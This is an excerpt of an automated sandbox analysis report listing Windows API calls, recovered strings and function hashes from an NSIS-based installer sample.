                                                                                                                                                                                                                                                                                                    • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                    • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                                                                                                                                    • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                                                                                    • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                                                                                    • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                                                    • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                                                    • API String ID: 2435955865-3712954417
                                                                                                                                                                                                                                                                                                    • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                                    • String ID: jF
                                                                                                                                                                                                                                                                                                    • API String ID: 2295610775-3349280890
                                                                                                                                                                                                                                                                                                    • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                                    • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED

[Figure: Control-flow Graph; legend: Executed, Not Executed]
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 310444273-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

[Figure: Control-flow Graph; legend: Executed, Not Executed]
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                                                    • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                                                    • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                                                    • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                                                    • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                                                    • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                                                    • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                                                    • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                                                    • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                                                    • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                                                    • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                                                    • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                                                    • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                                                    • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                                                    • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                                                    • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                                                    • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                                                    • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                                                    • SetFileAttributes failed., xrefs: 004017A1
Memory Dump Source
• Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                                                    • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                                                    • API String ID: 2872004960-3619442763
                                                                                                                                                                                                                                                                                                    • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                                                    • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                                                                                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                                                                                                                                    • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 0040593C
Memory Dump Source
• Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3282139019-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                                                    • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                                                                                    • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                                                                    • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                                                                    • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                                                    • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                                                    • API String ID: 608394941-2746725676
                                                                                                                                                                                                                                                                                                    • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                                                    • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042777E,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042777E,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042777E,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$open
                                                                                                                                                                                                                                                                                                    • API String ID: 4286501637-2478300759
                                                                                                                                                                                                                                                                                                    • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                                                    • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
